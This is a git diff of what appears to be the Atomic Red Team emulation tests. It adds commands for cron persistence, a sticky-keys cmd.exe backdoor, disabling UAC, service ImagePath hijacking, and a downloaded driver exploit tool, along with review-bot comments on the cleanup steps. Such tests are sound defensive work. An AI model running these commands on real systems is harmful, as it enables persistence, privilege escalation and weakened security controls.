@@ -43263,10 +43676,41 @@ execution: executor: elevation_required: true name: bash - command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} + command: | + echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} + cleanup_command: | + rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: 'This test adds a script to a /var/spool/cron/crontabs folder configured + to execute on a schedule. This technique was used by the threat actor Rocke + during the exploitation of Linux web servers. ' - cleanup_command: 'rm /etc/cron.daily/#{cron_script_name} + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + executor: + elevation_required: true + name: bash + command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + +' + cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} ' T1559.002: 
@@ -54456,7 +54900,51 @@ initial-access: - Daniel Oakley - Travis Smith, Tripwire x_mitre_version: '2.1' - atomic_tests: [] + identifier: T1133 + atomic_tests: + - name: Running Chrome VPN Extensions via the Registry 2 vpn extension + auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 + description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, + please see "T1133\src\list of vpn extension.txt" to view complete list + +' + supported_platforms: + - windows + input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + +' + dependency_executor_name: powershell + dependencies: + - description: 'chrome must be installed + +' + prereq_command: if (cmd /c "chrome 2>nul") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + executor: + name: powershell + elevation_required: true + command: | + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} + Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: |- + 
$extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} T1200: technique: id: attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9 diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index c5d38f78..52491f16 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -1,5 +1,5 @@ # T1003.008 - /etc/passwd and /etc/shadow -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003/008) +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db @@ -9,6 +9,8 @@ The Linux utility, unshadow, can be used to combine the two files in a format su - [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local) +- [Atomic Test #2 - Access /etc/passwd (Local)](#atomic-test-2---access-etcpasswd-local) +
@@ -21,12 +23,12 @@ The Linux utility, unshadow, can be used to combine the two files in a format su #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) ```bash @@ -55,12 +57,12 @@ rm -f #{output_file} #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| -#### Attack Commands: Run with `sh`! +#### Attack Commands: Run with `sh`! ```sh diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 5438e0a3..617951b6 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -18,6 +18,8 @@ Adversaries may use the information from [System Network Configuration Discovery - [Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6---adfind---enumerate-active-directory-subnet-objects) +- [Atomic Test #7 - Qakbot Recon](#atomic-test-7---qakbot-recon) +
@@ -250,4 +252,33 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste +
+
+ +## Atomic Test #7 - Qakbot Recon +A list of commands known to be performed by Qakbot for recon purposes + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder\T1016\src\qakbot.bat| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{recon_commands} +``` + + + + + +
diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml index e6522970..18d8f663 100644 --- a/atomics/T1016/T1016.yaml +++ b/atomics/T1016/T1016.yaml @@ -148,6 +148,7 @@ atomic_tests: name: command_prompt - name: Qakbot Recon + auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b description: A list of commands known to be performed by Qakbot for recon purposes supported_platforms: - windows diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md index b0fe3386..7cda336c 100644 --- a/atomics/T1053.003/T1053.003.md +++ b/atomics/T1053.003/T1053.003.md @@ -8,7 +8,9 @@ An adversary may use cron in Linux or Unix environments to execute - [Atomic Test #1 - Cron - Replace crontab with referenced file](#atomic-test-1---cron---replace-crontab-with-referenced-file) -- [Atomic Test #2 - Cron - Add script to cron folder](#atomic-test-2---cron---add-script-to-cron-folder) +- [Atomic Test #2 - Cron - Add script to all cron subfolders](#atomic-test-2---cron---add-script-to-all-cron-subfolders) + +- [Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder](#atomic-test-3---cron---add-script-to-varspoolcroncrontabs-folder)
@@ -48,8 +50,8 @@ crontab /tmp/notevil

-## Atomic Test #2 - Cron - Add script to cron folder -This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. +## Atomic Test #2 - Cron - Add script to all cron subfolders +This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** macOS, Linux @@ -68,11 +70,51 @@ This test adds a script to a cron folder configured to execute on a schedule. Th ```bash echo "#{command}" > /etc/cron.daily/#{cron_script_name} +echo "#{command}" > /etc/cron.hourly/#{cron_script_name} +echo "#{command}" > /etc/cron.monthly/#{cron_script_name} +echo "#{command}" > /etc/cron.weekly/#{cron_script_name} ``` #### Cleanup Commands: ```bash rm /etc/cron.daily/#{cron_script_name} +rm /etc/cron.hourly/#{cron_script_name} +rm /etc/cron.monthly/#{cron_script_name} +rm /etc/cron.weekly/#{cron_script_name} +``` + + + + + +
+
+ +## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder +This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| +| cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil| + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} +``` + +#### Cleanup Commands: +```bash +rm /var/spool/cron/crontabs/#{cron_script_name} ``` diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 632eccd0..0a6d22dc 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -42,6 +42,7 @@ information will be displayed. net localgroup net group /domain net group "domain admins" /domain +net group "enterprise admins" /domain ``` diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md new file mode 100644 index 00000000..346e3930 --- /dev/null +++ b/atomics/T1133/T1133.md @@ -0,0 +1,66 @@ +# T1133 - External Remote Services +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1133) +
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. + +Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
+ +## Atomic Tests + +- [Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension](#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension) + + +
+ +## Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension +Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| chrome_url | chrome installer download URL | url | https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe| +| extension_id | chrome extension id | String | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$extList = #{extension_id} +foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} +Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" +Start-Sleep -Seconds 30 +Stop-Process -Name "chrome" +``` + +#### Cleanup Commands: +```powershell +$extList = #{extension_id} +foreach ($extension in $extList) { +Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} +``` + + + +#### Dependencies: Run with `powershell`! 
+##### Description: chrome must be installed +##### Check Prereq Commands: +```powershell +if (cmd /c "chrome 2>nul") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} +Start-Process $env:temp\ChromeStandaloneSetup64.exe /S +``` + + + + +
diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml index aa5b5012..f6019a08 100644 --- a/atomics/T1133/T1133.yaml +++ b/atomics/T1133/T1133.yaml @@ -4,6 +4,7 @@ display_name: External Remote Services atomic_tests: - name: Running Chrome VPN Extensions via the Registry 2 vpn extension + auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 description: | Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index f04f0d2b..256f8447 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -194,7 +194,7 @@ Emulates attack via documents through protocol handler in Microsoft Office. On ```cmd -#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}" +"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ``` diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 1ddc2d51..4dbeacfc 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -14,7 +14,9 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as - [Atomic Test #3 - attrib - Remove read-only attribute](#atomic-test-3---attrib---remove-read-only-attribute) -- [Atomic Test #4 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style](#atomic-test-4---grant-full-access-to-entire-c-drive-for-everyone---ryuk-ransomware-style) +- [Atomic Test #4 - attrib - hide file](#atomic-test-4---attrib---hide-file) + +- [Atomic Test #5 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style](#atomic-test-5---grant-full-access-to-entire-c-drive-for-everyone---ryuk-ransomware-style)
@@ -155,7 +157,59 @@ attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt

-## Atomic Test #4 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style +## Atomic Test #4 - attrib - hide file +Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that +the victim does not see the file. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_or_folder | Path of the file or folder remove attribute. | path | %temp%\T1222.001_attrib_2| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt +attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt +``` + +#### Cleanup Commands: +```cmd +attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt +attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt +del #{file_or_folder}\T1222.001_attrib*.txt +rmdir #{file_or_folder} +``` + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Test requires a file to modify to be located at (#{file_or_folder}) +##### Check Prereq Commands: +```cmd +IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) +``` +##### Get Prereq Commands: +```cmd +mkdir #{file_or_folder} +echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt +echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt +``` + + + + +
+
+ +## Atomic Test #5 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style Invokes the command line used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **Supported Platforms:** Windows diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md index 0a0597d9..e36b7357 100644 --- a/atomics/T1546.008/T1546.008.md +++ b/atomics/T1546.008/T1546.008.md @@ -20,6 +20,8 @@ Other accessibility features exist that may also be leveraged in a similar fashi - [Atomic Test #1 - Attaches Command Prompt as a Debugger to a List of Target Processes](#atomic-test-1---attaches-command-prompt-as-a-debugger-to-a-list-of-target-processes) +- [Atomic Test #2 - Replace binary of sticky keys](#atomic-test-2---replace-binary-of-sticky-keys) +
@@ -47,7 +49,7 @@ Upon successful execution, powershell will modify the registry and swap osk.exe $input_table = "#{parent_list}".split(",") $Name = "Debugger" $Value = "#{attached_process}" -Foreach ($item in $input_table){ +Foreach ($item in $input_table){ $item = $item.trim() $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" IF(!(Test-Path $registryPath)) @@ -76,4 +78,35 @@ Foreach ($item in $input_table) +
+
+
+## Atomic Test #2 - Replace binary of sticky keys
+Replace sticky keys binary (sethc.exe) with cmd.exe
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+takeown /F C:\Windows\System32\sethc.exe /A
+icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+```
+
+#### Cleanup Commands:
+```cmd
+copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+```
+
+
+
+
+
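Review bot: The cleanup in this hunk only copies sethc_backup.exe back over sethc.exe; it leaves the backup copy in System32 and does not undo the `takeown` / `icacls ... /grant Administrators:F /t` steps, so after the test the accessibility binary stays owned and fully writable by Administrators instead of its normal TrustedInstaller ownership. Add `del C:\Windows\System32\sethc_backup.exe` to the cleanup block and restore ownership with `icacls C:\Windows\System32\sethc.exe /setowner "NT SERVICE\TrustedInstaller"`; the exact pre-test ACE should be confirmed on a reference system and re-applied as well. This .md appears to be generated from the technique's yaml, which is not in this chunk, so the fix belongs there.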
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 474cfe54..cd1a25c4 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -26,6 +26,8 @@ Another bypass is possible through some lateral movement techniques if credentia - [Atomic Test #7 - Bypass UAC using sdclt DelegateExecute](#atomic-test-7---bypass-uac-using-sdclt-delegateexecute) +- [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe) +
@@ -248,7 +250,7 @@ del "c:\testbypass.exe" >nul 2>nul
## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute -Bypasses User Account Control using a fileless method, registry only. +Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) @@ -283,4 +285,33 @@ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction I +
+
+
+## Atomic Test #8 - Disable UAC using reg.exe
+Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
+HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
+```
+
+
+
+
+
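Review bot: The cleanup command unconditionally writes `EnableLUA` back to 1, which assumes the value was 1 before the test; on a host where UAC was already disabled the cleanup changes state rather than restoring it, so the description should state that assumption or the test should record the prior value. The description should also mention that a change to EnableLUA normally only takes effect after a reboot, so neither the attack command nor the cleanup alters the running session immediately. `Conrol` in the description is a typo for `Control`. The .md appears to be generated from the yaml, which is outside this chunk, so both fixes belong in the source file.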
diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md index 3a5aac6e..f07dc900 100644 --- a/atomics/T1574.011/T1574.011.md +++ b/atomics/T1574.011/T1574.011.md @@ -10,11 +10,13 @@ Adversaries may also alter Registry keys associated with service failure paramet - [Atomic Test #1 - Service Registry Permissions Weakness](#atomic-test-1---service-registry-permissions-weakness) +- [Atomic Test #2 - Service ImagePath Change with reg.exe](#atomic-test-2---service-imagepath-change-with-regexe) +
## Atomic Test #1 - Service Registry Permissions Weakness -Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. +Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" **Supported Platforms:** Windows @@ -41,4 +43,51 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F +
+
+
+## Atomic Test #2 - Service ImagePath Change with reg.exe
+Change Service registry ImagePath of a bengin service to a malicious file
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| weak_service_name | weak service name | String | calcservice|
+| weak_service_path | weak service path | String | %windir%\system32\win32calc.exe|
+| malicious_service_path | malicious service path | String | %windir%\system32\cmd.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}"
+```
+
+#### Cleanup Commands:
+```cmd
+sc.exe delete #{weak_service_name}
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The service must exist (#{weak_service_name})
+##### Check Prereq Commands:
+```powershell
+if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+```
+
+
+
+
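Review bot: The attack command writes under `HKLM\SYSTEM\CurrentControlSet\Services` and the prereq runs `sc.exe create`, both of which need an elevated prompt, yet unlike the other tests added in this series (the sethc.exe and EnableLUA tests carry "Elevation Required") this one has no elevation marker, so it would likely fail with access denied when run unelevated. `sc.exe delete #{weak_service_name}` as the cleanup is destructive if a caller points `weak_service_name` at a pre-existing service; restoring the original path with `reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{weak_service_path}"` and deleting the service only when the prereq created it would be safer. `bengin` in the description is a typo for `benign`. The .md appears to be generated from the yaml, which is not in this chunk, so the fixes belong there.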
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e91c59e1..b37349ef 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -614,3 +614,12 @@ d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec f3a6cceb-06c9-48e5-8df8-8867a6814245 c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f +121de5c6-5818-4868-b8a7-8fd07c455c1b +2d943c18-e74a-44bf-936f-25ade6cccab4 +4c8db261-a58b-42a6-a866-0a294deedde4 +32b979da-7b68-42c9-9a99-0e39900fc36c +934e90cf-29ca-48b3-863c-411737ad44e3 +9e8af564-53ec-407e-aaa8-3cb20c3af7f9 +f38e9eea-e1d7-4ba6-b716-584791963827 +3723ab77-c546-403c-8fb4-bb577033b235 +60e860b6-8ae6-49db-ad07-5e73edd88f5d From 5832c65cb2875e23f6442d4c4f1cfa69d6d14560 Mon Sep 17 00:00:00 2001 From: Michael Haag Date: Mon, 30 Nov 2020 14:34:25 -0700 Subject: [PATCH 09/13] T1014 - Driver Rootkit Test Update (#1303) * T1014 - Driver rootkit test Fixed Test 3 per issue #1153 . - Added pre-req - New comments for additional info on retrieving the capcom driver - Added elevation required - Added new input argument for puppetstrings.exe Confirmed operational on win10. * Generate docs from job=validate_atomics_generate_docs branch=T1014 * Fixed GUID * Generate docs from job=validate_atomics_generate_docs branch=T1014 * Update used_guids.txt Co-authored-by: CircleCI Atomic Red Team doc generator --- atomics/Indexes/index.yaml | 38 ++++++++++++++++++++++++++------------ atomics/T1014/T1014.md | 22 ++++++++++++++++++---- atomics/T1014/T1014.yaml | 29 +++++++++++++++++++++++------ 3 files changed, 67 insertions(+), 22 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a13e2434..8f2af952 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -33399,27 +33399,41 @@ defense-evasion: elevation_required: true - name: Windows Signed Driver Rootkit Test auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae - description: | - This test exploits a signed driver to execute code in Kernel. - SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 - We leverage the work done here: - https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html - The hash of our PoC Exploit is - SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 - This will simulate hiding a process. - It would be wise if you only run this in a test environment + description: "This test exploits a signed driver to execute code in Kernel.\nThis + example was curated from a blog that utilizes puppetstrings.exe with the vulnerable + (signed driver) capcom.sys. \nThe capcom.sys driver may be found on github. + A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html\nSHA1 + C1D5CF8C43E7679B782630E93F5E6420CA1749A7\nWe leverage the work done here:\nhttps://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html\nThe + hash of our PoC Exploit is\nSHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441\nThis + will simulate hiding a process.\n" supported_platforms: - windows input_arguments: driver_path: - description: Path to the vulnerable driver + description: Path to a vulnerable driver type: Path default: C:\Drivers\driver.sys - executor: - command: 'puppetstrings #{driver_path} + puppetstrings_path: + description: Path of puppetstrings.exe + type: Path + default: PathToAtomicsFolder\T1014\bin\puppetstrings.exe + dependency_executor_name: powershell + dependencies: + - description: 'puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) ' + prereq_command: 'if (Test-Path #{puppetstrings_path}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" + -OutFile 
"#{puppetstrings_path}" + +' + executor: name: command_prompt + command: "#{puppetstrings_path} #{driver_path}\n" + elevation_required: true T1564.006: technique: external_references: diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 09b77975..e9f81566 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -124,13 +124,14 @@ sudo depmod -a ## Atomic Test #3 - Windows Signed Driver Rootkit Test This test exploits a signed driver to execute code in Kernel. +This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. +The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. -It would be wise if you only run this in a test environment **Supported Platforms:** Windows 
@@ -140,19 +141,32 @@ It would be wise if you only run this in a test environment #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys| +| driver_path | Path to a vulnerable driver | Path | C:\Drivers\driver.sys| +| puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder\T1014\bin\puppetstrings.exe| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd -puppetstrings #{driver_path} +#{puppetstrings_path} #{driver_path} ``` +#### Dependencies: Run with `powershell`! +##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}" +``` + +
